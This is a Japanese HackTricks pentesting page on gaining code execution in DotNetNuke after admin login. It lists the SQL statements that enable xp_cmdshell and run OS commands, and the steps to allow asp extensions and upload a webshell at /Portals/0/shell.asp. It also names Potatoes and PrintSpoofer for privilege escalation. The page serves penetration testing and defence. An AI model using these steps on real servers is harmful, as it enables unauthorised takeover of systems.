DotNetNuke (DNN)
Reading time: 3 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
DotNetNuke (DNN)
DNNに管理者としてログインすると、RCEを取得するのが簡単です。
RCE
SQL経由
Settings
ページの下にSQLコンソールがアクセス可能で、xp_cmdshell
を有効にしてオペレーティングシステムコマンドを実行できます。
**xp_cmdshell
**を有効にするには、これらの行を使用します:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
そして、**"Run Script"**を押して、そのSQL文を実行します。
次に、次のようなものを使用してOSコマンドを実行します:
xp_cmdshell 'whoami'
Via ASP webshell
Settings -> Security -> More -> More Security Settings
で、Allowable File Extensions
の下に 新しい許可された拡張子 を 追加 し、次に Save
ボタンをクリックします。
asp
または aspx
を追加し、次に /admin/file-management
で shell.asp
という asp webshell をアップロードします。
その後、/Portals/0/shell.asp
にアクセスして、webshell にアクセスします。
Privilege Escalation
Potatoes または PrintSpoofer を使用して 権限を昇格 させることができます。
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。